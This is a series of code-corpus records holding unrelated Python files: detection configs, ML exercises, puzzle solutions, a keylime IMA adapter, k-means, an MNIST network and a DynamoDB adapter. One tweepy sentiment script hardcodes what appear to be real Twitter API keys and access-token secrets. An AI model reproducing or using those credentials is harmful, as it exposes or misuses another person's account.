mean=[123.675, 116.28, 103.53],\n std=[58.395, 57.12, 57.375],\n to_rgb=True),\n dict(type='Pad', size_divisor=32),\n dict(type='DefaultFormatBundle'),\n dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels'])\n]\ntest_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(\n type='MultiScaleFlipAug',\n img_scale=(512, 512),\n flip=False,\n transforms=[\n dict(type='Resize', keep_ratio=True),\n dict(type='RandomFlip'),\n dict(\n type='Normalize',\n mean=[123.675, 116.28, 103.53],\n std=[58.395, 57.12, 57.375],\n to_rgb=True),\n dict(type='Pad', size_divisor=32),\n dict(type='ImageToTensor', keys=['img']),\n dict(type='Collect', keys=['img'])\n ])\n]\ndata = dict(\n samples_per_gpu=2,\n workers_per_gpu=2,\n train=dict(\n type='CocoDataset',\n ann_file='../data_coco/train_annotations.json',\n img_prefix='../data_coco/train',\n classes=('01_ulcer', '02_mass', '04_lymph', '05_bleeding'),\n pipeline=[\n dict(type='LoadImageFromFile'),\n dict(type='LoadAnnotations', with_bbox=True),\n dict(\n type='Resize',\n img_scale=[(512, 461), (512, 563)],\n multiscale_mode='range',\n keep_ratio=True),\n dict(type='RandomFlip', flip_ratio=0.5),\n dict(\n type='Normalize',\n mean=[123.675, 116.28, 103.53],\n std=[58.395, 57.12, 57.375],\n to_rgb=True),\n dict(type='Pad', size_divisor=32),\n dict(type='DefaultFormatBundle'),\n dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels'])\n ]),\n val=dict(\n type='CocoDataset',\n ann_file='../data_coco/valid_annotations.json',\n img_prefix='../data_coco/valid',\n classes=('01_ulcer', '02_mass', '04_lymph', '05_bleeding'),\n pipeline=[\n dict(type='LoadImageFromFile'),\n dict(\n type='MultiScaleFlipAug',\n img_scale=(512, 512),\n flip=False,\n transforms=[\n dict(type='Resize', keep_ratio=True),\n dict(type='RandomFlip'),\n dict(\n type='Normalize',\n mean=[123.675, 116.28, 103.53],\n std=[58.395, 57.12, 57.375],\n to_rgb=True),\n dict(type='Pad', size_divisor=32),\n dict(type='ImageToTensor', keys=['img']),\n dict(type='Collect', keys=['img'])\n ])\n ]),\n test=dict(\n type='CocoDataset',\n ann_file='../data_coco/valid_annotations.json',\n img_prefix='../data_coco/valid',\n classes=('01_ulcer', '02_mass', '04_lymph', '05_bleeding'),\n pipeline=[\n dict(type='LoadImageFromFile'),\n dict(\n type='MultiScaleFlipAug',\n img_scale=(512, 512),\n flip=False,\n transforms=[\n dict(type='Resize', keep_ratio=True),\n dict(type='RandomFlip'),\n dict(\n type='Normalize',\n mean=[123.675, 116.28, 103.53],\n std=[58.395, 57.12, 57.375],\n to_rgb=True),\n dict(type='Pad', size_divisor=32),\n dict(type='ImageToTensor', keys=['img']),\n dict(type='Collect', keys=['img'])\n ])\n ]))\nevaluation = dict(interval=1, metric='bbox')\noptimizer = dict(\n type='AdamW',\n lr=0.0001,\n betas=(0.9, 0.999),\n weight_decay=0.05,\n paramwise_cfg=dict(\n custom_keys=dict(\n absolute_pos_embed=dict(decay_mult=0.0),\n relative_position_bias_table=dict(decay_mult=0.0),\n norm=dict(decay_mult=0.0))))\noptimizer_config = dict(grad_clip=None)\nlr_config = dict(\n policy='step',\n warmup='linear',\n warmup_iters=1000,\n warmup_ratio=0.001,\n step=[27, 33])\nrunner = dict(type='EpochBasedRunner', max_epochs=36)\ncheckpoint_config = dict(interval=1)\nlog_config = dict(\n interval=50, hooks=[dict(type='TextLoggerHook', interval=100)])\ncustom_hooks = [dict(type='NumClassCheckHook')]\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]\npretrained = 
'https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window7_224_22k.pth'\nfind_unused_parameters = True\nwork_dir = 'ckpts/atss_swin-l_ms'\ngpu_ids = range(0, 1)\n","sub_path":"mmdetection/ckpts/atss_swin-l_ms/final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":7284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"551531447","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 23 12:53:38 2020\r\n\r\n@author: Adjecti-1\r\n\"\"\"\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# importing the dataset\r\ndataset = pd.read_csv('Position_Salaries.csv')\r\nX = dataset.iloc[:, 1:-1].values # iloc selects by integer index\r\ny = dataset.iloc[:, -1].values\r\n\r\n# Feature Scaling\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc_X = StandardScaler()\r\nX = sc_X.fit_transform(X)\r\nsc_y = StandardScaler()\r\ny = y.reshape(len(y), 1)\r\ny = sc_y.fit_transform(y)\r\n\r\n# Creating and Training the regressor\r\nfrom sklearn.svm import SVR\r\nregressor = SVR(kernel='rbf')\r\nregressor.fit(X, y)\r\ny_pred = sc_y.inverse_transform(regressor.predict(sc_X.transform([[6.5]])))\r\n\r\n# Visualizing the data\r\nplt.scatter(sc_X.inverse_transform(X), sc_y.inverse_transform(y), color=\"red\")\r\nplt.plot(sc_X.inverse_transform(X), sc_y.inverse_transform(regressor.predict(X)), color=\"blue\")\r\nplt.xlabel(\"Position Levels\")\r\nplt.ylabel(\"Salary\")\r\nplt.title(\"Truth or Bluff\")\r\nplt.show()\r\n","sub_path":"Machine-Learning/data-sets/Part 2 - Regression/Section 7 - Support Vector Regression (SVR)/prcts/SVR.py","file_name":"SVR.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"233917389","text":"\ndef doMove(ptr, direction):\n    dirs = {\n        'L':[0,-1],\n        'R':[0, 1],\n        'D':[1,-1],\n        'U':[1, 1]\n    }\n\n    i, k = dirs[direction]\n    ptr[i] += k\n    return ptr\n\nwith open('input') as text:\n    mem = {}\n    commands = []\n    for i, line in enumerate(text.readlines()):\n    # for i, line in enumerate(['R98,U47,R26,D63,R33,U87,L62,D20,R33,U53,R51','U98,R91,D20,R16,D67,R40,U7,R15,U6,R7']):\n        ptr = [0, 0]\n        moves = line.split(',')\n        step_counter = 0\n        for move in moves:\n            for _ in range(int(move[1:])):\n                ptr = doMove(ptr, move[0])\n                step_counter += 1\n                key = tuple(ptr)\n                if key in mem:\n                    if mem[key][0] != i:\n                        mem[key][0] = 2\n                        mem[key][1] += step_counter\n                    # else:\n                    #     step_counter = mem[key][1]\n                else:\n                    mem[key] = [i, step_counter]\n    \n    cptr = False\n    min_steps = False\n    for k, v in mem.items():\n        if v[0] == 2:\n            print(k, v)\n            manhattan = abs(k[0]) + abs(k[1])\n            cptr = manhattan if not cptr else min(manhattan, cptr)\n            min_steps = v[1] if not min_steps else min(v[1], min_steps)\n    \n    print('Part 1:', cptr)\n    print('Part 2:', min_steps)\n","sub_path":"03/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"428486898","text":"\"\"\"\nOperators\n\nComplete the code so that it performs the specified tasks\n\"\"\"\n\n# build a sentence from the given list of words\nwords = ['Ala', 'ma', 'kota', 'a', 'kot', 'ma', 'Alę']\n\n\n# add the missing word (operating on the list) and\n# reverse the order of the words (not the characters) in the given sentence\nsentance = 'Ala ma kota a kot ma'\n\n\n# sort the numbers in the given list in ascending\n# order\nnumbers = [100, 12, -52.3, 57, 1, -40, 0, 74]\n\n\n# sort the numbers in the given list in ascending\n# order by absolute value\nnumbers_abs = [100, 12, -52.3, 57, 1, -40, 0, 74]\n\n\n# given a list of animals, modify the list\n# so that it contains only pets\npets = ['cat', 'snake', 'doge', 'llama', 'hamster']\n","sub_path":"rozdzial1/live_coding/ex06.py","file_name":"ex06.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"526999248","text":"# # textblob \n# new1 = TextBlob(\"random text here\")\n# new1.tags returns the part-of-speech tags\n# new1.words tokenizes the text into words\n# new1.sentiment.polarity gives sentiment -1 to 1 from sad to happy\n\nimport csv\nimport tweepy\nfrom textblob import TextBlob\n\nconsumer_key= '8LMIGPdNKwPMasLeUIWpVSY15'\nconsumer_secret= 'MbQGzudmi6qlGaSEap7FdRQSQkEIT2d5nIn20MuUQn209CnON8'\n\naccess_token='959668567401615360-8GHTVoWrTCyf0VGUJABZi5gmCWvWYUG'\naccess_token_secret='zTqWKZLvFEZMkN9GO2fbLN1TPESnbUF8vcEte7iAXWrsw'\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n\ntwitter = tweepy.API(auth)\n\ntweets = twitter.search('game of thrones')\n\n\n\nwith open('p2sentiment.csv', 'w', newline='') as csvfile:\n\tout = csv.writer(csvfile, delimiter=' ',quotechar='|', quoting=csv.QUOTE_MINIMAL)\n\tfor tweet in tweets:\n\t\tprint(tweet.text)\n\t\tanalysis = TextBlob(tweet.text)\n\t\tout.writerow(analysis.sentiment)\n\t\t#out.write('\\n')\n\t\tprint(analysis.sentiment)\n\t\tprint(\"\")\n\n\n#polarity - how positive or negative the tweet is\n#subjectivity - how much opinion it is vs how much fact\n","sub_path":"Sentiment Analysis using Tweepy/p2_sklearn.py","file_name":"p2_sklearn.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"222786755","text":"#!/usr/bin/python3\n'''\nSPDX-License-Identifier: Apache-2.0\nCopyright 2017 Massachusetts Institute of Technology.\n'''\n\nimport sys\nimport select\nimport time\nimport itertools\n\nfrom keylime.tpm.tpm_abstract import config, hashlib\nfrom keylime.tpm import tpm_obj\nfrom keylime.common import algorithms\n\n# get the tpm object\ntpm = tpm_obj.getTPM(need_hw_tpm=True)\n\nstart_hash = ('0000000000000000000000000000000000000000')\nff_hash = ('ffffffffffffffffffffffffffffffffffffffff')\n\n\ndef ml_extend(ml, position, searchHash=None):\n    global start_hash\n    f = open(ml, 'r')\n    lines = itertools.islice(f, position, None)\n\n    # initialize the running hash once, so it accumulates across lines\n    runninghash = start_hash.encode('utf-8')\n\n    for line in lines:\n        line = line.strip()\n        tokens = line.split()\n\n        if line == '':\n            continue\n        if len(tokens) < 5:\n            print(\"ERROR: invalid measurement list file line: -%s-\" % (line))\n            return position\n        position += 1\n\n        # get the filename roughly\n        path = str(line[line.rfind(tokens[3]) + len(tokens[3]) + 1:])\n        template_hash = tokens[1]\n\n        # this is some IMA weirdness\n        if template_hash == start_hash:\n            template_hash = ff_hash\n\n        if searchHash is None:\n            print(\"extending hash %s for %s\" % (template_hash, path))\n            # TODO: Add support for other hash algorithms\n            tpm.extendPCR(config.IMA_PCR, template_hash, algorithms.Hash.SHA1)\n        else:\n            # Let's only encode if its not a byte\n            try:\n                template_hash = template_hash.encode('utf-8')\n            except AttributeError:\n                pass\n\n            runninghash = hashlib.sha1(runninghash + template_hash).digest()\n\n            if runninghash == searchHash:\n                print(\"Located last IMA file updated: %s\" % (path))\n                return position\n\n    if searchHash is not None:\n        raise Exception(\n            \"Unable to find current measurement list position, resetting the TPM emulator may be necessary\")\n\n    return position\n\n\ndef main():\n    if not tpm.is_emulator():\n        raise Exception(\"This stub should only be used with a TPM emulator\")\n\n    # initialize position in ML\n    pos = 0\n\n    # check if pcr is clean\n    pcrval = tpm.readPCR(config.IMA_PCR, algorithms.Hash.SHA1)\n    if pcrval != start_hash:\n        print(\"Warning: IMA PCR is not empty, trying to find the last updated file in the measurement list...\")\n        pos = ml_extend(config.IMA_ML, 0, pcrval)\n\n    print(\"Monitoring %s\" % (config.IMA_ML))\n    poll_object = select.poll()\n    fd_object = open(config.IMA_ML, \"r\")\n    number = fd_object.fileno()\n    poll_object.register(fd_object, select.POLLIN | select.POLLPRI)\n\n    while True:\n        results = poll_object.poll()\n        for result in results:\n            if result[0] != number:\n                continue\n            pos = ml_extend(config.IMA_ML, pos)\n            time.sleep(0.2)\n    sys.exit(1)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"keylime/cmd/ima_emulator_adapter.py","file_name":"ima_emulator_adapter.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"188942527","text":"class Solution(object):\n    def subarraySum(self, nums, k):\n        \"\"\"\n        :type nums: List[int]\n        :type k: int\n        :rtype: int\n        \"\"\"\n        sumArray = []\n        sumArray.append(0)\n        \n        for i in range(len(nums)):\n            sumArray.append(sumArray[i]+nums[i])\n        \n        count={}\n        result = 0\n        for i in sumArray:\n            if i-k in count:\n                result+=count[i-k]\n            if i in count:\n                count[i]+=1\n            else:\n                count[i]=1\n        \n        \n        return result","sub_path":"Python/Medium/560. 
Subarray Sum Equals K.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"128062262","text":"import math\n\ndef diag(mat):\n\n \"\"\"\n Diagonalization function in 2-dimension\\n\n # input requirement\\n\n mat: input matrix in 2-dimension, shape = (2, 2)\\n\n ***WARNING*** check if mat is in float data type!\\n\n # output description\\n\n [diag, U]\\n\n diag: diagonalized matrix\\n\n U: unitary operator\\n\n # Formula\\n\n mat = U·diag·U', where U' means transpose of U\n \"\"\"\n\n if abs(mat[0][0]-mat[1][1]) > 1E-5:\n theta = 0.5*math.atan(2*mat[0][1]/(mat[0][0]-mat[1][1]))\n else:\n theta = math.pi/4\n\n eigenVal1 = mat[0][0]*(math.cos(theta)**2) + mat[1][1]*(math.sin(theta)**2) + mat[0][1]*math.sin(2*theta)\n eigenVal2 = mat[0][0]*(math.sin(theta)**2) + mat[1][1]*(math.cos(theta)**2) - mat[0][1]*math.sin(2*theta)\n U = [[math.cos(theta), math.sin(theta)], [math.sin(theta), -math.cos(theta)]]\n diagMat = [[eigenVal1, 0.0], [0.0, eigenVal2]]\n\n return [diagMat, U]\n","sub_path":"hf/diag_so2.py","file_name":"diag_so2.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"488092388","text":"from collections import defaultdict\nfrom math import inf\nimport random\nimport csv\n\n\ndef point_avg(points):\n \"\"\"\n Accepts a list of points, each with the same number of dimensions.\n (points can have more dimensions than 2)\n \n Returns a new point which is the center of all the points.\n \"\"\"\n summation: list = [sum(x) for x in zip(*points)]\n return [colSum /len(points) for colSum in summation]\n\n\ndef update_centers(dataset, assignments):\n \"\"\"\n Accepts a dataset and a list of assignments; the indexes \n of both lists correspond to each other.\n Compute the center for each of the assigned groups.\n Return `k` centers in a list\n \"\"\"\n temp = defaultdict(list)\n centers = []\n for assignment, point in zip(assignments, dataset):\n temp[assignment].append(point)\n\n for i in temp.values():\n centers.append(point_avg(i))\n\n return centers\n\ndef assign_points(data_points, centers):\n \"\"\"\n \"\"\"\n assignments = []\n for point in data_points:\n shortest = inf # positive infinity\n shortest_index = 0\n for i in range(len(centers)):\n val = distance(point, centers[i])\n if val < shortest:\n shortest = val\n shortest_index = i\n assignments.append(shortest_index)\n return assignments\n\n\ndef distance(a, b):\n \"\"\"\n Returns the Euclidean distance between a and b\n \"\"\"\n if (hasattr(a[0], '__len__')):\n rows = len(a); cols = len(a[0])\n summation = 0\n\n for i in range(rows):\n vec = [a[i][j] - b[i][j] for j in range(cols)]\n\n s = sum(i**2 for i in vec)\n summation += s\n\n\n else:\n summation = sum([(a[i] - b[i])**2 for i in range(len(a))])\n\n return summation**(1/2)\n\ndef distance_squared(a, b):\n return distance(a, b)**2\n\ndef generate_k(dataset, k):\n \"\"\"\n Given `data_set`, which is an array of arrays,\n return a random set of k points from the data_set\n \"\"\"\n points = [dataset[random.randint(0, len(dataset) - 1)] for i in range(0, k)]\n return points\n\ndef cost_function(clustering):\n total_cost = 0\n for data_set in clustering.keys():\n datas = clustering[data_set]\n centers = point_avg(datas)\n for indiv_data in datas:\n total_cost += distance(indiv_data, centers)\n return total_cost\n\ndef generate_k_pp(dataset, k):\n \"\"\"\n Given `data_set`, which is an array of 
arrays,\n return a random set of k points from the data_set\n where points are picked with a probability proportional\n to their distance as per kmeans pp\n \"\"\"\n random_centers: list = generate_k(dataset, k)\n random_assignments: list = assign_points(dataset, random_centers)\n\n distances: list = [distance(random_centers[random_assignments[i]], dataset[i]) for i in range(len(dataset))]\n \n # Generate indices for each distance then sort in ascending order of distance\n indices: list = [i for i in range(len(distances))]\n indices = [j for i, j in sorted(zip(distances, indices))]\n\n weighted_indices: list = []\n for i in range(len(indices)):\n n: int = int(distances[indices[i]])\n \n for j in range(n):\n weighted_indices.append(indices[i])\n\n N: int = len(weighted_indices) - 1\n\n pp_centers: list = []\n random_numbers: list = []\n choices: list = []\n for i in range(k):\n random_choice: int = random.randint(0, N)\n index = weighted_indices[random_choice]\n\n if random_choice in random_numbers or index in choices:\n while random_choice in choices or index in choices:\n random_choice = random.randint(0, N)\n index = weighted_indices[random_choice]\n\n random_numbers.append(random_choice)\n choices.append(index)\n pp_centers.append(dataset[index])\n \n return pp_centers\n\n\ndef _do_lloyds_algo(dataset, k_points):\n assignments = assign_points(dataset, k_points)\n old_assignments = None\n while assignments != old_assignments:\n new_centers = update_centers(dataset, assignments)\n old_assignments = assignments\n assignments = assign_points(dataset, new_centers)\n clustering = defaultdict(list)\n for assignment, point in zip(assignments, dataset):\n clustering[assignment].append(point)\n return clustering\n\n\ndef k_means(dataset, k):\n if k not in range(1, len(dataset)+1):\n raise ValueError(\"lengths must be in [1, len(dataset)]\")\n \n k_points = generate_k(dataset, k)\n return _do_lloyds_algo(dataset, k_points)\n\n\ndef k_means_pp(dataset, k):\n if k not in range(1, len(dataset)+1):\n raise ValueError(\"lengths must be in [1, len(dataset)]\")\n\n k_points = generate_k_pp(dataset, k)\n return _do_lloyds_algo(dataset, k_points)\n\nif __name__ =='__main__':\n from cs506 import read\n\n data = read.read_csv('D:/OneDrive/College Notebook/Boston University/Fall Senior Year/CS 506/CS506-Fall2020/02-library/tests/test_files/dataset_1.csv')\n res = (k_means(data, 4))\n print(res[0])","sub_path":"02-library/cs506/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"36016999","text":"import sys, os\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom chap3_minist import load_mnist\nfrom PIL import Image\nfrom collections import OrderedDict\n\nclass MulLayer:\n def __init__(self):\n self.x = None\n self.y = None\n\n def forward(self, x, y):\n self.x = x\n self.y = y\n out = x * y\n return out\n\n def backward(self, dout):\n dx = dout * self.y\n dy = dout * self.x\n return dx, dy\n\n\nclass AddLayer:\n def __init__(self):\n pass\n\n def forward(self, x, y):\n out = x + y\n return out\n\n def backward(self, dout):\n dx = dout * 1\n dy = dout * 1\n return dx, dy\n\n\nclass ReLu:\n def __init__(self):\n self.mask = None\n\n def forward(self, x):\n self.mask = (x <= 0)\n out = x.copy()\n out[self.mask] = 0\n return out\n \n def backward(self, dout):\n dout[self.mask] = 0\n dx = dout\n return dx\n\nclass Sigmoid:\n def __init__(self):\n self.out = None\n\n def 
forward(self, x):\n        out = 1 / (1 + np.exp(-x))\n        self.out = out\n        return out\n\n    def backward(self, dout):\n        dx = dout * (1.0 - self.out) * self.out\n        return dx\n\nclass Affine:\n    def __init__(self, W, b):\n        self.W = W\n        self.b = b\n        self.x = None\n        self.dW = None\n        self.db = None\n\n    def forward(self, x):\n        self.x = x\n        out = np.dot(x, self.W) + self.b\n        return out\n\n    def backward(self, dout):\n        dx = np.dot(dout, self.W.T)\n        self.dW = np.dot(self.x.T, dout)\n        self.db = np.sum(dout, axis = 0)\n        return dx\n\ndef softmax(x):\n    if x.ndim == 2:\n        x = x.T\n        x = x - np.max(x, axis=0)\n        y = np.exp(x) / np.sum(np.exp(x), axis=0)\n        return y.T \n\n    x = x - np.max(x) # guard against overflow\n    return np.exp(x) / np.sum(np.exp(x))\n\ndef cross_entropy_error(y, t):\n    # delta = 1e-7\n    # return -np.psum(t * np.log(y + delta))\n    if y.ndim == 1:\n        t = t.reshape(1, t.size)\n        y = y.reshape(1, y.size)\n\n    batch_size = y.shape[0]\n    return -np.sum(t * np.log(y + 1e-7)) / batch_size\n\nclass SoftmaxWithLoss:\n    def __init__(self):\n        self.loss = None\n        self.y = None\n        self.t = None\n\n    def forward(self, x, t):\n        self.t = t\n        self.y = softmax(x)\n        self.loss = cross_entropy_error(self.y, self.t)\n        return self.loss\n\n    def backward(self, dout = 1):\n        batch_size = self.t.shape[0]\n        dx = (self.y - self.t) / batch_size\n        return dx\n\ndef numerical_gradient(f, x):\n    h = 1e-4 # 0.0001\n    grad = np.zeros_like(x)\n    \n    it = np.nditer(x, flags=['multi_index'], op_flags=['readwrite'])\n    while not it.finished:\n        idx = it.multi_index\n        tmp_val = x[idx]\n        x[idx] = tmp_val + h\n        fxh1 = f(x) # f(x+h)\n        \n        x[idx] = tmp_val - h \n        fxh2 = f(x) # f(x-h)\n        grad[idx] = (fxh1 - fxh2) / (2*h)\n        \n        x[idx] = tmp_val # restore the original value\n        it.iternext()\n        \n    return grad\n\nclass TwoLayerNet:\n\n    def __init__(self, input_size, hidden_size, output_size,\n                 weight_init_std = 0.01):\n        self.params = {}\n        self.params['W1'] = weight_init_std * \\\n                            np.random.randn(input_size, hidden_size)\n        self.params['b1'] = np.zeros(hidden_size)\n        self.params['W2'] = weight_init_std * \\\n                            np.random.randn(hidden_size, output_size)\n        self.params['b2'] = np.zeros(output_size)\n\n        self.layers = OrderedDict()\n        self.layers['Affine1'] = Affine(self.params['W1'], self.params['b1'])\n        self.layers['ReLu1'] = ReLu()\n        self.layers['Affine2'] = Affine(self.params['W2'], self.params['b2'])\n\n        self.lastLayer = SoftmaxWithLoss()\n\n    def predict(self, x):\n        for layer in self.layers.values():\n            x = layer.forward(x)\n        return x\n\n    def loss(self, x, t):\n        y = self.predict(x)\n        return self.lastLayer.forward(y, t)\n\n    def accuracy(self, x, t):\n        y = self.predict(x)\n        y = np.argmax(y, axis = 1)\n        if t.ndim != 1:\n            t = np.argmax(t, axis = 1)\n\n        accuracy = np.sum(y == t) / float(x.shape[0])\n        return accuracy\n\n    def numerical_gradient(self, x, t):\n        loss_W = lambda W: self.loss(x, t)\n\n        grads = {}\n        grads['W1'] = numerical_gradient(loss_W, self.params['W1'])\n        grads['b1'] = numerical_gradient(loss_W, self.params['b1'])\n        grads['W2'] = numerical_gradient(loss_W, self.params['W2'])\n        grads['b2'] = numerical_gradient(loss_W, self.params['b2'])\n        return grads\n\n    def gradient(self, x, t):\n        self.loss(x, t)\n\n        dout = 1\n        dout = self.lastLayer.backward(dout)\n\n        layers = list(self.layers.values())\n        layers.reverse()\n        for layer in layers:\n            dout = layer.backward(dout)\n\n        grads = {}\n        grads['W1'] = self.layers['Affine1'].dW\n        grads['b1'] = self.layers['Affine1'].db\n        grads['W2'] = self.layers['Affine2'].dW\n        grads['b2'] = self.layers['Affine2'].db\n        return grads\n\n\nif __name__ == '__main__':\n    (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label = True)\n    network = TwoLayerNet(input_size = 784, hidden_size = 50,\n                          output_size = 10)\n\n    iters_num = 10000\n    train_size = x_train.shape[0]\n    batch_size = 100\n    learning_rate = 0.1\n\n    train_loss_list = []\n    train_acc_list = []\n    test_acc_list = []\n\n    iter_per_epoch = max(train_size / batch_size, 1)\n\n    for i in range(iters_num):\n        batch_mask = np.random.choice(train_size, batch_size)\n        x_batch = x_train[batch_mask]\n        t_batch = t_train[batch_mask]\n\n        grad = network.gradient(x_batch, t_batch)\n\n        for key in ('W1', 'b1', 'W2', 'b2'):\n            network.params[key] -= learning_rate * grad[key]\n\n        loss = network.loss(x_batch, t_batch)\n        train_loss_list.append(loss)\n\n        if i % iter_per_epoch == 0:\n            train_acc = network.accuracy(x_train, t_train)\n            test_acc = network.accuracy(x_test, t_test)\n            train_acc_list.append(train_acc)\n            test_acc_list.append(test_acc)\n            print(train_acc, test_acc)\n","sub_path":"chap5.py","file_name":"chap5.py","file_ext":"py","file_size_in_byte":6319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"387389125","text":"import socket\r\nimport math\r\nimport threading\r\nimport time\r\n\r\nclass process1:\r\n\r\n    def process1_socket(self, port):\r\n        host = '127.0.0.1'\r\n        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n        s.bind((host, port))\r\n        return s\r\n\r\n    def __init__(self, process_port):\r\n        self.events_sent = [1.1, 1.2, 1.3]\r\n        self.flag = False\r\n        self.process_port = int(process_port)\r\n        self.sock = self.process1_socket(self.process_port)\r\n        self.events_sofar = []\r\n        self.ack_recv = []\r\n\r\n    def process1_send(self):\r\n        while self.flag is False:\r\n            message1 = {'message': 1.1}\r\n            message2 = {'message': 1.2}\r\n            message3 = {'message': 1.3}\r\n            self.sock.sendto(str(message1).encode('utf-8'), ('127.0.0.1', 5002))\r\n            self.sock.sendto(str(message2).encode('utf-8'), ('127.0.0.1', 5002))\r\n            self.sock.sendto(str(message3).encode('utf-8'), ('127.0.0.1', 5002))\r\n            self.sock.sendto(str(message1).encode('utf-8'), ('127.0.0.1', 5003))\r\n            self.sock.sendto(str(message2).encode('utf-8'), ('127.0.0.1', 5003))\r\n            self.sock.sendto(str(message3).encode('utf-8'), ('127.0.0.1', 5003))\r\n\r\n    def process1_listen(self):\r\n        while True:\r\n            try:\r\n                if self.sock is not None:\r\n                    data, server_address = self.sock.recvfrom(1024)\r\n                    decode_data = eval(data.decode('utf-8'))\r\n                    if 'message' in decode_data:\r\n                        self.events_sofar.append(decode_data['message'])\r\n                    elif 'ack' in decode_data:\r\n                        self.ack_recv.append(decode_data['ack'])\r\n            except KeyboardInterrupt:\r\n                self.sock.close()\r\n\r\n    def process1_ack(self):\r\n        if len(self.events_sofar) > 0:\r\n            self.events_sofar = sorted(self.events_sofar)\r\n            for each_event in range(len(self.events_sofar)):\r\n                fractional, pid = math.modf(self.events_sofar[each_event])\r\n                if pid == 2:\r\n                    self.sock.sendto(str({'ack': self.events_sofar[each_event]}).encode('utf-8'), ('127.0.0.1', 5002))\r\n                elif pid == 3:\r\n                    self.sock.sendto(str({'ack': self.events_sofar[each_event]}).encode('utf-8'), ('127.0.0.1', 5003))\r\n\r\n    def process1_observe(self):\r\n        while True:\r\n            if len(self.ack_recv) > 0:\r\n                self.flag = True\r\n                break\r\n            else:\r\n                continue\r\n\r\n    def print_events(self):\r\n        for event in range(len(self.events_sent)):\r\n            self.events_sofar.append(self.events_sent[event])\r\n        b = list(set(self.events_sofar))\r\n        b.sort(key=float)\r\n        for each in range(len(b)):\r\n            fractional, pid = math.modf(b[each])\r\n            if pid == 1:\r\n                print(\"{} is self event\".format(b[each]))\r\n            else:\r\n                print('successfully event {} received'.format(b[each]))\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n    server = process1(5001)\r\n    time.sleep(0.8)\r\n    threading.Thread(target=server.process1_listen).start()\r\n    threading.Thread(target=server.process1_send).start()\r\n    threading.Thread(target=server.process1_ack).start()\r\n    threading.Thread(target=server.process1_observe).start()\r\n    time.sleep(4)\r\n    server.print_events()\r\n    print(\"process1-completed successfully\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"process1.py","file_name":"process1.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"557318070","text":"from typing import Optional\nimport logging\n\nimport boto3\nfrom botocore.exceptions import ClientError\n\nfrom kermes_infra.models import EBook\n\n\nclass EBookAdapter:\n    def __init__(self, endpoint_url: str, table_name: str, logger: logging.Logger) -> None:\n        self.dynamodb = boto3.resource(\"dynamodb\", endpoint_url=endpoint_url)\n        self.table = self.dynamodb.Table(table_name)\n        self.logger = logger\n\n    def get(self, user_id: str, ebook_id: str) -> Optional[EBook]:\n        try:\n            item = self.table.get_item(Key={\"user_id\": user_id, \"ebook_id\": ebook_id})\n\n            return EBook.from_dynamo(item[\"Item\"])\n        except ClientError:\n            self.logger.exception(f\"error while getting record from Dynamo: user_id {user_id}, ebook_id {ebook_id}\")\n            return None\n\n    def get_all(self, user_id: str):\n        pass\n\n    def put(self, ebook: EBook) -> bool:\n        try:\n            self.table.put_item(Item=ebook.to_dynamo())\n            return True\n        except ClientError:\n            self.logger.exception(\n                f\"error while writing record to Dynamo: user_id {ebook.user_id}, ebook_id {ebook.ebook_id}\",\n            )\n            return False\n","sub_path":"libs/kermes-infra/kermes_infra/repositories/aws_adapters/ebook_adapter.py","file_name":"ebook_adapter.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
